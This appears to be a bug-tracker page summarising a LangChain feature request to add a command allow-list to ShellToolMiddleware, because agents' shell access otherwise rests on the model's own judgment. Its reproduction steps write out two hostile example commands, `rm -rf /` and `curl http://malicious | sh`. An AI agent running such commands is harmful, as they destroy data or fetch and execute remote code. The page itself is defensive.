AI & Agent Dev Bug Sandbox logo
AI & Agent Dev Bug Sandbox
Back to Radar

Add Allow_list To ShellToolMiddleware To Restrict Shell Commands

ShellToolMiddleware currently defaults to HostExecutionPolicy, allowing arbitrary shell commands with only LLM guardrails. This feature request proposes an allow_list parameter to restrict executable commands, mitigating the risk of dangerous operations.

highConfidence 85%Langchain

Origin Analysis

The underlying design flaw is that ShellToolMiddleware lacks a deterministic command allowlist; it relies solely on LLM discretion, which is insufficient to prevent execution of destructive shell commands.
1. Instantiate ShellToolMiddleware without an allow_list. 2. Configure an agent to use this middleware. 3. Instruct the agent to execute a high-risk command such as `rm -rf /` or `curl http://malicious | sh`. 4. Observe that the command executes without any middleware-level restriction, demonstrating the missing safety boundary.

Fixing Code Block

Edge Case Audit

This fix may block legitimate compound commands that use pipes or redirects, breaking existing workflows. It also assumes a specific wrap_tool_call signature; if the actual middleware API differs, the code may need adjustment. Concurrency is safe as long as allow_list is immutable, but mutable lists could introduce race conditions. For rollback, remove the allow_list parameter and restore the original wrap_tool_call/awrap_tool_call implementations. Consider adding an escape hatch or configurable safe patterns for advanced users.

Ecosystem Topology